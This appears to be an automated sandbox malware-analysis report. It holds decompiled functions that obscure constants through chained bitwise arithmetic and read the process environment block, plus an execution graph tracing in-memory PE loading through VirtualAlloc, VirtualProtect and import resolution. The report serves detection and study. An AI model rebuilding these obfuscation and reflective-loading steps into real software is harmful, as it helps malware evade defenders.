                                                                                                          			E02AEEF0C(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _t57;
				signed int _t67;

				_v28 = 4;
				_v24 = 0xd6e1b5;
				_v24 = _v24 | 0x5e4e7cd1;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x20005ede;
				_v12 = 0x35fbf9;
				_v12 = _v12 << 2;
				_v12 = _v12 + 0xffffd421;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x000779ff;
				_v8 = 0xb66603;
				_v8 = _v8 | 0x4ba1ba6b;
				_v8 = _v8 ^ 0x6df4d1b9;
				_v8 = _v8 ^ 0x1286fe83;
				_v8 = _v8 ^ 0x34cd5dfe;
				_v20 = 0x1bb0b6;
				_v20 = _v20 | 0x21937f20;
				_v20 = _v20 << 4;
				_v20 = _v20 ^ 0x19bd1c5b;
				_v16 = 0xd95204;
				_v16 = _v16 ^ 0x6876e9a1;
				_t67 = 0x62;
				_v16 = _v16 / _t67;
				_v16 = _v16 ^ 0x01180520;
				_t57 = E02AF60B8(_v12, _v24 | __edx, _v8,  &_v28,  &_v32, __ecx, __ecx, _v20, _v16);
				asm("sbb eax, eax");
				return  ~_t57 & _v32;
			}












                                                                                                          0x02aeef12
                                                                                                          0x02aeef19
                                                                                                          0x02aeef20
                                                                                                          0x02aeef27
                                                                                                          0x02aeef2b
                                                                                                          0x02aeef32
                                                                                                          0x02aeef39
                                                                                                          0x02aeef3d
                                                                                                          0x02aeef44
                                                                                                          0x02aeef48
                                                                                                          0x02aeef4f
                                                                                                          0x02aeef56
                                                                                                          0x02aeef5d
                                                                                                          0x02aeef64
                                                                                                          0x02aeef6b
                                                                                                          0x02aeef72
                                                                                                          0x02aeef79
                                                                                                          0x02aeef80
                                                                                                          0x02aeef84
                                                                                                          0x02aeef8d
                                                                                                          0x02aeef96
                                                                                                          0x02aeefa4
                                                                                                          0x02aeefa7
                                                                                                          0x02aeefad
                                                                                                          0x02aeefcc
                                                                                                          0x02aeefd6
                                                                                                          0x02aeefe0

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
                                                                                                          • Instruction ID: c085c86c5871d210dcb49da4bf518db92d6fb60b1912d0dad52e3ec5a669ce01
                                                                                                          • Opcode Fuzzy Hash: 0453756cfbe0a422653622112b7418f35eca55d4e05d609691c55542fdca0349
                                                                                                          • Instruction Fuzzy Hash: 1D21E572C0120DABDB09DFE5CA4A5EFFBB5EB44204F608199D512B6110D3B54B059FA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEC5D8, Relevance: .1, Instructions: 53COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E02AEC5D8(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _t69;
				signed int _t70;

				_v32 = _v32 & 0x00000000;
				_v36 = 0xa0afa0;
				_v28 = 0x9adc8d;
				_v28 = _v28 ^ 0x90925320;
				_v28 = _v28 ^ 0x90088fa5;
				_v24 = 0x1cb3a6;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0xb3a3d0bd;
				_v8 = 0xc8bfd2;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0x77b2;
				_t69 = 0x16;
				_v8 = _v8 / _t69;
				_v8 = _v8 ^ 0x0000123c;
				_v20 = 0x3ff815;
				_v20 = _v20 | 0x9e661a12;
				_v20 = _v20 + 0x3006;
				_v20 = _v20 ^ 0x9e825c55;
				_v12 = 0xda9b76;
				_t70 = 0x6b;
				_v12 = _v12 / _t70;
				_v12 = _v12 | 0xed94e7c2;
				_v12 = _v12 + 0xffffd684;
				_v12 = _v12 ^ 0xed94606e;
				_v16 = 0x191c50;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 >> 7;
				_v16 = _v16 ^ 0x00013f6e;
				return E02AF648A(_a4, _v20, _v12, _v16, E02B028EB(), _v28);
			}













                                                                                                          0x02aec5de
                                                                                                          0x02aec5e4
                                                                                                          0x02aec5eb
                                                                                                          0x02aec5f2
                                                                                                          0x02aec5f9
                                                                                                          0x02aec600
                                                                                                          0x02aec607
                                                                                                          0x02aec60b
                                                                                                          0x02aec612
                                                                                                          0x02aec619
                                                                                                          0x02aec61d
                                                                                                          0x02aec629
                                                                                                          0x02aec62e
                                                                                                          0x02aec633
                                                                                                          0x02aec63a
                                                                                                          0x02aec641
                                                                                                          0x02aec648
                                                                                                          0x02aec64f
                                                                                                          0x02aec656
                                                                                                          0x02aec660
                                                                                                          0x02aec663
                                                                                                          0x02aec666
                                                                                                          0x02aec66d
                                                                                                          0x02aec674
                                                                                                          0x02aec67b
                                                                                                          0x02aec682
                                                                                                          0x02aec686
                                                                                                          0x02aec68a
                                                                                                          0x02aec6b7

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
                                                                                                          • Instruction ID: f3567e1438a04ccf5124c8150215cb353b08b0cdf92f68fc7da40e63d7bfc361
                                                                                                          • Opcode Fuzzy Hash: dff3ba8f753cea4a216cf5286b6b65d773786d22712bd0b12a3c0018268a50f8
                                                                                                          • Instruction Fuzzy Hash: 9F21FFB5D0020DEBDF08DFE1C98A4EEBBB2BB54718F208088D525B6264D7B94B54CF91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEF7F7, Relevance: .0, Instructions: 2COMMON
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 100%
                                                                                                          			E02AEF7F7() {

				return  *[fs:0x30];
			}



                                                                                                          0x02aef7fd

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                          • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                          • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                          • Instruction Fuzzy Hash:
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Analysis Process: regsvr32.exe PID: 5396 Parent PID: 6260 regsvr32.exeCOMMON

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.5%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:6.7%
                                                                                                          Total number of Nodes:1089
                                                                                                          Total number of Limit Nodes:21

                                                                                                          Graph

                                                                                                          execution_graph 17450 100036a0 17453 1002e654 17450->17453 17452 100036c0 17454 1002e707 17453->17454 17461 1002e666 17453->17461 17455 1003654f _malloc 6 API calls 17454->17455 17464 1002e6f3 17455->17464 17459 1002e6c3 RtlAllocateHeap 17459->17461 17461->17459 17462 1002e677 17461->17462 17461->17464 17498 1002e605 17461->17498 17506 1003654f 17461->17506 17462->17461 17465 10036507 17462->17465 17471 1003635c 17462->17471 17495 100306e0 17462->17495 17464->17452 17466 1003650e __set_error_mode 17465->17466 17467 1003635c __NMSG_WRITE 31 API calls 17466->17467 17469 1003653d 17466->17469 17468 10036533 17467->17468 17470 1003635c __NMSG_WRITE 31 API calls 17468->17470 17469->17462 17470->17469 17473 10036370 __set_error_mode 17471->17473 17472 100364d0 GetStdHandle 17474 100364de _strlen 17472->17474 17493 100364cb 17472->17493 17473->17472 17476 100363b5 _strcpy_s 17473->17476 17473->17493 17475 100364f7 WriteFile 17474->17475 17474->17493 17475->17493 17477 100363eb GetModuleFileNameA 17476->17477 17476->17493 17509 10032cb9 17476->17509 17480 10036409 _strcpy_s 17477->17480 17486 1003642c __mbsnbcpy_s_l _strlen 17477->17486 17483 10032cb9 __invoke_watson 10 API calls 17480->17483 17480->17486 17481 1003646f _strcat_s 17484 10036496 _strcat_s 17481->17484 17485 10036489 17481->17485 17483->17486 17488 100364b8 17484->17488 17489 100364ae 17484->17489 17487 10032cb9 __invoke_watson 10 API calls 17485->17487 17486->17481 17494 10032cb9 __invoke_watson 10 API calls 17486->17494 17490 10036493 17487->17490 17516 1003e278 17488->17516 17491 10032cb9 __invoke_watson 10 API calls 17489->17491 17490->17484 17491->17488 17493->17462 17494->17481 17581 100306b5 GetModuleHandleW 17495->17581 17499 1002e611 17498->17499 17501 1002e642 17499->17501 17584 10035865 17499->17584 17501->17461 17502 1002e627 17591 10036077 17502->17591 17507 10034524 __decode_pointer 6 API calls 17506->17507 17508 1003655f 17507->17508 17508->17461 17543 1002e1f0 17509->17543 17511 10032ce6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17512 10032dc2 GetCurrentProcess TerminateProcess 17511->17512 17513 10032db6 __invoke_watson 17511->17513 17545 1002db0d 17512->17545 17513->17512 17515 10032ddf 17515->17477 17554 1003451b 17516->17554 17519 1003e29b LoadLibraryA 17521 1003e2b0 GetProcAddress 17519->17521 17522 1003e3c5 17519->17522 17520 1003e323 17539 1003e34d 17520->17539 17567 10034524 TlsGetValue 17520->17567 17521->17522 17523 1003e2c6 17521->17523 17522->17493 17557 100344a9 TlsGetValue 17523->17557 17524 1003e378 17528 10034524 __decode_pointer 6 API calls 17524->17528 17525 10034524 __decode_pointer 6 API calls 17536 1003e390 17525->17536 17528->17522 17531 10034524 __decode_pointer 6 API calls 17531->17539 17532 100344a9 __encode_pointer 6 API calls 17533 1003e2e1 GetProcAddress 17532->17533 17534 100344a9 __encode_pointer 6 API calls 17533->17534 17535 1003e2f6 GetProcAddress 17534->17535 17537 100344a9 __encode_pointer 6 API calls 17535->17537 17536->17524 17538 10034524 __decode_pointer 6 API calls 17536->17538 17540 1003e30b 17537->17540 17538->17524 17539->17524 17539->17525 17540->17520 17541 1003e315 GetProcAddress 17540->17541 17542 100344a9 __encode_pointer 6 API calls 17541->17542 17542->17520 17544 1002e1fc __VEC_memzero 17543->17544 17544->17511 17546 1002db17 IsDebuggerPresent 17545->17546 17547 1002db15 17545->17547 17553 1003b990 17546->17553 17547->17515 17550 10031d4c SetUnhandledExceptionFilter UnhandledExceptionFilter 17551 10031d71 GetCurrentProcess TerminateProcess 17550->17551 17552 10031d69 __invoke_watson 17550->17552 17551->17515 17552->17551 17553->17550 17555 100344a9 __encode_pointer 6 API calls 17554->17555 17556 10034522 17555->17556 17556->17519 17556->17520 17558 100344e2 GetModuleHandleW 17557->17558 17559 100344c1 17557->17559 17561 100344f2 17558->17561 17562 100344fd GetProcAddress 17558->17562 17559->17558 17560 100344cb TlsGetValue 17559->17560 17565 100344d6 17560->17565 17577 1003065c 17561->17577 17564 100344da GetProcAddress 17562->17564 17564->17532 17565->17558 17565->17564 17568 1003455d GetModuleHandleW 17567->17568 17569 1003453c 17567->17569 17570 10034578 GetProcAddress 17568->17570 17571 1003456d 17568->17571 17569->17568 17572 10034546 TlsGetValue 17569->17572 17576 10034555 17570->17576 17573 1003065c __crt_waiting_on_module_handle 2 API calls 17571->17573 17574 10034551 17572->17574 17575 10034573 17573->17575 17574->17568 17574->17576 17575->17570 17575->17576 17576->17531 17578 10030667 Sleep GetModuleHandleW 17577->17578 17579 10030685 17578->17579 17580 10030689 17578->17580 17579->17578 17579->17580 17580->17562 17580->17564 17582 100306c9 GetProcAddress 17581->17582 17583 100306d9 ExitProcess 17581->17583 17582->17583 17585 1003587a 17584->17585 17586 1003588d EnterCriticalSection 17584->17586 17600 100357a2 17585->17600 17586->17502 17588 10035880 17588->17586 17621 1003068c 17588->17621 17593 100360a5 17591->17593 17592 1003613e 17595 1002e632 17592->17595 17670 10035c8e 17592->17670 17593->17592 17593->17595 17663 10035bde 17593->17663 17597 1002e64b 17595->17597 17674 1003578b LeaveCriticalSection 17597->17674 17599 1002e652 17599->17501 17601 100357ae 17600->17601 17602 100357d4 17601->17602 17603 10036507 __FF_MSGBANNER 31 API calls 17601->17603 17609 100357e4 17602->17609 17628 100351ae 17602->17628 17604 100357c3 17603->17604 17606 1003635c __NMSG_WRITE 31 API calls 17604->17606 17608 100357ca 17606->17608 17607 100357ef 17607->17609 17611 10035865 __lock 49 API calls 17607->17611 17610 100306e0 _malloc 3 API calls 17608->17610 17609->17588 17610->17602 17612 1003580c 17611->17612 17613 10035840 17612->17613 17614 10035814 17612->17614 17616 1002e577 ___init_ctype 49 API calls 17613->17616 17633 100386ab 17614->17633 17620 1003582b 17616->17620 17617 1003581f 17617->17620 17637 1002e577 17617->17637 17649 1003585c 17620->17649 17622 10036507 __FF_MSGBANNER 31 API calls 17621->17622 17623 10030696 17622->17623 17624 1003635c __NMSG_WRITE 31 API calls 17623->17624 17625 1003069e 17624->17625 17626 10034524 __decode_pointer 6 API calls 17625->17626 17627 100306a9 17626->17627 17627->17586 17630 100351b7 17628->17630 17629 1002e654 _malloc 48 API calls 17629->17630 17630->17629 17631 100351ed 17630->17631 17632 100351ce Sleep 17630->17632 17631->17607 17632->17630 17634 10030e38 17633->17634 17635 100386b7 InitializeCriticalSectionAndSpinCount 17634->17635 17636 100386fb 17635->17636 17636->17617 17638 1002e583 17637->17638 17639 1002e5fc _realloc 17638->17639 17641 10035865 __lock 47 API calls 17638->17641 17648 1002e5c2 17638->17648 17639->17620 17640 1002e5d7 RtlFreeHeap 17640->17639 17642 1002e5e9 17640->17642 17645 1002e59a ___sbh_find_block 17641->17645 17643 1002e5ee GetLastError 17642->17643 17643->17639 17644 1002e5b4 17658 1002e5cd 17644->17658 17645->17644 17652 100358c8 17645->17652 17648->17639 17648->17640 17662 1003578b LeaveCriticalSection 17649->17662 17651 10035863 17651->17609 17653 10035ba9 ___sbh_free_block 17652->17653 17654 10035907 17652->17654 17653->17644 17654->17653 17655 10035af3 VirtualFree 17654->17655 17656 10035b57 17655->17656 17656->17653 17657 10035b66 VirtualFree HeapFree 17656->17657 17657->17653 17661 1003578b LeaveCriticalSection 17658->17661 17660 1002e5d4 17660->17648 17661->17660 17662->17651 17664 10035bf1 HeapReAlloc 17663->17664 17665 10035c25 HeapAlloc 17663->17665 17666 10035c13 17664->17666 17667 10035c0f 17664->17667 17665->17667 17668 10035c48 VirtualAlloc 17665->17668 17666->17665 17667->17592 17668->17667 17669 10035c62 HeapFree 17668->17669 17669->17667 17671 10035ca5 VirtualAlloc 17670->17671 17673 10035cec 17671->17673 17673->17595 17674->17599 17675 10003440 17676 1000344f 17675->17676 17678 10003454 17675->17678 17681 100033f0 17676->17681 17679 1002e654 _malloc 49 API calls 17678->17679 17680 10003464 17678->17680 17679->17680 17682 1002e654 _malloc 49 API calls 17681->17682 17683 100033fe 17682->17683 17683->17678 17684 10003160 17687 10002d40 17684->17687 17722 100024a0 17687->17722 17690 10002d69 17691 10002d83 SetLastError 17691->17690 17692 10002d95 17693 100024a0 SetLastError 17692->17693 17694 10002dae 17693->17694 17694->17690 17695 10002dd0 SetLastError 17694->17695 17696 10002de2 17694->17696 17695->17690 17697 10002df1 SetLastError 17696->17697 17698 10002e03 17696->17698 17697->17690 17699 10002e0e SetLastError 17698->17699 17701 10002e20 GetNativeSystemInfo 17698->17701 17699->17690 17702 10002ed4 SetLastError 17701->17702 17703 10002ee6 VirtualAlloc 17701->17703 17702->17690 17704 10002f32 GetProcessHeap HeapAlloc 17703->17704 17705 10002f07 VirtualAlloc 17703->17705 17707 10002f6c 17704->17707 17708 10002f4c VirtualFree SetLastError 17704->17708 17705->17704 17706 10002f23 SetLastError 17705->17706 17706->17690 17709 100024a0 SetLastError 17707->17709 17708->17690 17710 10002fce 17709->17710 17711 10002fd2 17710->17711 17712 10002fdc VirtualAlloc 17710->17712 17711->17690 17754 10003310 17711->17754 17713 1000300b 17712->17713 17725 100024d0 17713->17725 17716 1000303f 17716->17711 17735 10002ab0 17716->17735 17720 100030a8 17720->17711 17721 1000310f SetLastError 17720->17721 17721->17711 17723 100024bb 17722->17723 17724 100024af SetLastError 17722->17724 17723->17690 17723->17691 17723->17692 17724->17723 17726 10002500 17725->17726 17727 10002593 17726->17727 17728 1000253c VirtualAlloc 17726->17728 17734 100025b0 17726->17734 17729 100024a0 SetLastError 17727->17729 17730 10002560 17728->17730 17731 10002567 17728->17731 17732 100025ac 17729->17732 17730->17734 17731->17726 17733 100025b4 VirtualAlloc 17732->17733 17732->17734 17733->17734 17734->17716 17736 10002ae9 IsBadReadPtr 17735->17736 17737 10002adf 17735->17737 17736->17737 17739 10002b13 17736->17739 17737->17711 17748 100027c0 17737->17748 17739->17737 17740 10002b45 SetLastError 17739->17740 17741 10002b59 17739->17741 17740->17737 17761 100023c0 17741->17761 17744 10002ba9 17744->17737 17747 10002cb9 SetLastError 17744->17747 17745 10002b7f SetLastError 17745->17737 17747->17737 17752 10002808 17748->17752 17749 10002911 17750 10002690 2 API calls 17749->17750 17751 100028ed 17750->17751 17751->17720 17752->17749 17752->17751 17776 10002690 17752->17776 17755 10003325 17754->17755 17760 1000332a 17754->17760 17755->17690 17756 100033b4 17757 100033c0 VirtualFree 17756->17757 17758 100033d4 GetProcessHeap HeapFree 17756->17758 17757->17758 17758->17755 17759 10002370 VirtualFree 17759->17756 17760->17756 17760->17759 17762 100023cc 17761->17762 17765 100023d5 17761->17765 17769 100022a0 17762->17769 17768 100023e3 17765->17768 17772 10002390 VirtualAlloc 17765->17772 17766 100023f1 17766->17768 17773 10002370 17766->17773 17768->17744 17768->17745 17770 100022b0 VirtualQuery 17769->17770 17771 100022ac 17769->17771 17770->17771 17771->17765 17772->17766 17774 10002379 VirtualFree 17773->17774 17775 1000238a 17773->17775 17774->17775 17775->17768 17777 100026ac 17776->17777 17778 100026a2 17776->17778 17780 10002714 VirtualProtect 17777->17780 17781 100026ba 17777->17781 17778->17752 17780->17778 17781->17778 17782 100026f2 VirtualFree 17781->17782 17782->17778 17783 10024d50 17788 1002b0bb 17783->17788 17785 10024d82 17787 10024d5f 17787->17785 17795 1002acfb 17787->17795 17791 1002b0c7 __EH_prolog3 17788->17791 17790 1002b115 17818 1002ac8f EnterCriticalSection 17790->17818 17791->17790 17803 1002adac EnterCriticalSection 17791->17803 17825 10023b5b 17791->17825 17794 1002b122 std::locale::_Locimp::_Locimp 17794->17787 17796 1002ad07 __EH_prolog3_catch 17795->17796 17797 1002ad30 std::locale::_Locimp::_Locimp 17796->17797 17886 1002a6ab 17796->17886 17797->17787 17799 1002ad16 17800 1002ad23 17799->17800 17896 10024d0b 17799->17896 17899 1002a71d 17800->17899 17804 1002adcf 17803->17804 17806 1002ae8e _memset 17804->17806 17807 1002ae08 17804->17807 17808 1002ae1d GlobalHandle GlobalUnlock 17804->17808 17805 1002aea5 LeaveCriticalSection 17805->17791 17806->17805 17832 10023778 17807->17832 17810 10023778 ctype 3 API calls 17808->17810 17812 1002ae3b GlobalReAlloc 17810->17812 17813 1002ae47 17812->17813 17814 1002ae6e GlobalLock 17813->17814 17815 1002ae52 GlobalHandle GlobalLock 17813->17815 17816 1002ae60 LeaveCriticalSection 17813->17816 17814->17806 17815->17816 17836 10023b23 17816->17836 17819 1002acd1 LeaveCriticalSection 17818->17819 17820 1002acaa 17818->17820 17822 1002acda 17819->17822 17820->17819 17821 1002acaf TlsGetValue 17820->17821 17821->17819 17823 1002acbb 17821->17823 17822->17794 17823->17819 17824 1002acc0 LeaveCriticalSection 17823->17824 17824->17822 17826 100312cd __CxxThrowException@8 RaiseException 17825->17826 17827 10023b76 17826->17827 17828 10031319 __cftof 2 API calls 17827->17828 17829 10023b8d 17828->17829 17830 100210ff 3 API calls 17829->17830 17831 10023b93 17830->17831 17831->17791 17833 1002378d ctype 17832->17833 17834 1002379a GlobalAlloc 17833->17834 17847 10001650 17833->17847 17834->17813 17851 100312cd 17836->17851 17838 10023b3e 17839 100312cd __CxxThrowException@8 RaiseException 17838->17839 17840 10023b5a 17839->17840 17841 100312cd __CxxThrowException@8 RaiseException 17840->17841 17842 10023b76 17841->17842 17854 10031319 17842->17854 17846 10023b93 17846->17814 17848 1000165c 17847->17848 17850 10001661 17847->17850 17849 10023b23 ctype 3 API calls 17848->17849 17849->17850 17850->17834 17852 10031302 RaiseException 17851->17852 17853 100312f6 17851->17853 17852->17838 17853->17852 17870 1003a6c5 17854->17870 17856 10023b8d 17857 100210ff 17856->17857 17858 1002110b 17857->17858 17859 10021129 17857->17859 17860 100312cd __CxxThrowException@8 RaiseException 17858->17860 17865 10021110 17858->17865 17859->17846 17861 10023b3e 17860->17861 17864 100312cd __CxxThrowException@8 RaiseException 17861->17864 17862 100312cd __CxxThrowException@8 RaiseException 17863 10023b76 17862->17863 17866 10031319 __cftof 2 API calls 17863->17866 17864->17865 17865->17859 17865->17862 17867 10023b8d 17866->17867 17868 100210ff 3 API calls 17867->17868 17869 10023b93 17868->17869 17869->17846 17871 1003a6d9 17870->17871 17872 1003a73f _LocaleUpdate::_LocaleUpdate 17871->17872 17873 1003a6dd __mbsnbcpy_s_l 17871->17873 17872->17873 17874 1003a767 17872->17874 17873->17856 17875 1003a7a3 17874->17875 17878 1003a86b 17874->17878 17880 1003a7d5 17875->17880 17881 100318ee 17875->17881 17877 100318ee __mbsnbcpy_s_l _LocaleUpdate::_LocaleUpdate 17877->17878 17878->17873 17878->17877 17879 100318ee __mbsnbcpy_s_l _LocaleUpdate::_LocaleUpdate 17879->17880 17880->17873 17880->17879 17884 1003189b _LocaleUpdate::_LocaleUpdate 17881->17884 17885 100318be 17884->17885 17885->17875 17887 1002a6c0 17886->17887 17888 1002a6bb 17886->17888 17890 1002a6ce 17887->17890 17903 1002a687 17887->17903 17889 10023b5b ~_Task_impl 3 API calls 17888->17889 17889->17887 17892 1002a6e0 EnterCriticalSection 17890->17892 17893 1002a70a EnterCriticalSection 17890->17893 17894 1002a6ff LeaveCriticalSection 17892->17894 17895 1002a6ec InitializeCriticalSection 17892->17895 17893->17799 17894->17893 17895->17894 17906 10024bd0 17896->17906 17898 10024d17 17898->17800 17900 1002a72a 17899->17900 17901 1002a72f LeaveCriticalSection 17899->17901 17902 10023b5b ~_Task_impl 3 API calls 17900->17902 17901->17797 17902->17901 17904 1002a690 InitializeCriticalSection 17903->17904 17905 1002a6a5 17903->17905 17904->17905 17905->17890 17907 10024bdc __EH_prolog3_catch 17906->17907 17926 1001e8f0 17907->17926 17916 10024c97 17918 1002ac5c 4 API calls 17916->17918 17919 10024caa 17918->17919 17920 10024cbc 17919->17920 17948 10024b06 17919->17948 17922 1002ac5c 4 API calls 17920->17922 17923 10024cd0 17922->17923 17925 10024ce2 std::locale::_Locimp::_Locimp 17923->17925 17954 10024b89 17923->17954 17925->17898 17927 1001e8fe 17926->17927 17928 10001650 ctype 3 API calls 17927->17928 17929 1001e921 17927->17929 17928->17927 17930 1001ed40 17929->17930 17931 1001ed82 17930->17931 17932 1001ed76 17930->17932 17934 10020421 17931->17934 17960 1001f370 17932->17960 17937 10020429 17934->17937 17935 1002e654 _malloc 49 API calls 17935->17937 17936 1002044b 17938 1002ac5c LocalAlloc 17936->17938 17937->17935 17937->17936 17939 1002ac70 17938->17939 17940 10024c85 17938->17940 17941 10023b23 ctype 3 API calls 17939->17941 17940->17916 17942 100248e2 17940->17942 17941->17940 17943 100248ee __EH_prolog3 17942->17943 17997 10021b88 17943->17997 17945 100248fd 18005 10024854 17945->18005 17947 1002490d std::locale::_Locimp::_Locimp 17947->17916 17949 10024b12 __EH_prolog3 17948->17949 17950 10021b88 80 API calls 17949->17950 17951 10024b21 17950->17951 17952 10024854 4 API calls 17951->17952 17953 10024b31 std::locale::_Locimp::_Locimp 17952->17953 17953->17920 17955 10024b95 __EH_prolog3 17954->17955 17956 10021b88 80 API calls 17955->17956 17957 10024ba4 17956->17957 17958 10024854 4 API calls 17957->17958 17959 10024bb3 std::locale::_Locimp::_Locimp 17958->17959 17959->17925 17961 1001f38f 17960->17961 17962 1001f3b9 17961->17962 17963 1001f3ab 17961->17963 17965 1001f3b7 17962->17965 17975 1001fc30 17962->17975 17967 1001fb60 17963->17967 17965->17931 17968 1001fb8e 17967->17968 17982 100236ce 17968->17982 17971 1001fbb1 17989 1002e804 17971->17989 17973 1001fbeb 17973->17965 17976 1001fc57 17975->17976 17977 1001fc5d 17975->17977 17976->17977 17978 1001fc64 17976->17978 17979 1001fb50 3 API calls 17977->17979 17980 1001fc62 17978->17980 17981 1001fb50 3 API calls 17978->17981 17979->17980 17980->17965 17981->17980 17983 100236e2 17982->17983 17984 1001fba3 17982->17984 17985 1002e654 _malloc 49 API calls 17983->17985 17984->17971 17986 1001fb50 17984->17986 17985->17984 17987 10001650 ctype 3 API calls 17986->17987 17988 1001fb5d 17987->17988 17988->17971 17990 1002e818 17989->17990 17992 1002e814 _memset 17989->17992 17990->17992 17993 1002db20 17990->17993 17992->17973 17994 1002db38 17993->17994 17995 1002db5f __VEC_memcpy 17994->17995 17996 1002db67 17994->17996 17995->17996 17996->17992 17998 10021b94 __EH_prolog3 17997->17998 18008 1001eb70 17998->18008 18003 10021bc2 std::locale::_Locimp::_Locimp 18003->17945 18070 100221d6 18005->18070 18009 1001eb79 18008->18009 18010 10001650 ctype 3 API calls 18009->18010 18011 1001eb99 18009->18011 18010->18009 18012 10021955 18011->18012 18013 10021961 18012->18013 18014 10021974 18012->18014 18013->18014 18020 10021931 18013->18020 18014->18003 18016 1001e950 18014->18016 18017 1001e95f _strlen 18016->18017 18054 1001f240 18017->18054 18025 1002b1bf 18020->18025 18023 10021950 18023->18014 18037 10024d50 18025->18037 18028 10021885 18042 100211e0 FindResourceA 18028->18042 18030 1002189a 18031 100218ca 18030->18031 18047 10021259 WideCharToMultiByte 18030->18047 18031->18023 18033 100218b1 18034 1001ed40 53 API calls 18033->18034 18035 100218be 18034->18035 18048 10021275 WideCharToMultiByte 18035->18048 18038 1002b0bb ctype 17 API calls 18037->18038 18041 10024d5f 18038->18041 18039 10021941 18039->18023 18039->18028 18040 1002acfb ctype 80 API calls 18040->18041 18041->18039 18041->18040 18043 10021201 18042->18043 18044 100211ff 18042->18044 18049 10021183 LoadResource 18043->18049 18044->18030 18046 1002120d 18046->18030 18047->18033 18048->18031 18050 1002119a LockResource 18049->18050 18051 10021198 18049->18051 18052 100211be 18050->18052 18053 100211a8 SizeofResource 18050->18053 18051->18046 18052->18046 18053->18052 18055 1001f25c 18054->18055 18056 1001f24f 18054->18056 18058 1001f26c 18055->18058 18060 10001650 ctype 3 API calls 18055->18060 18066 1001ec80 18056->18066 18059 1001f2c7 18058->18059 18061 1001f370 53 API calls 18058->18061 18063 1002e804 _memcpy_s __VEC_memcpy 18059->18063 18064 1001f2dd _memmove_s 18059->18064 18060->18058 18061->18059 18062 1001e987 18062->18003 18063->18064 18064->18062 18065 10001650 ctype 3 API calls 18064->18065 18065->18062 18067 1001ecaa 18066->18067 18068 1001eca5 18066->18068 18067->18068 18069 10001650 ctype 3 API calls 18067->18069 18068->18062 18069->18068 18073 10022179 18070->18073 18076 1001f410 18073->18076 18078 1001f430 18076->18078 18077 1001f450 18077->17947 18078->18077 18079 1001f48a 18078->18079 18080 1001fb50 3 API calls 18078->18080 18081 1002e804 _memcpy_s __VEC_memcpy 18079->18081 18080->18079 18081->18077 18082 1002eaac 18083 1002eab7 18082->18083 18084 1002eabc 18082->18084 18100 1003732f 18083->18100 18088 1002e9b6 18084->18088 18087 1002eaca 18089 1002e9c2 18088->18089 18093 1002ea0f 18089->18093 18095 1002ea5f 18089->18095 18104 1002e881 18089->18104 18093->18095 18151 10008080 18093->18151 18095->18087 18101 10037361 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 18100->18101 18102 10037354 18100->18102 18103 10037358 18101->18103 18102->18101 18102->18103 18103->18084 18105 1002e890 18104->18105 18106 1002e90c 18104->18106 18155 10035645 HeapCreate 18105->18155 18107 1002e912 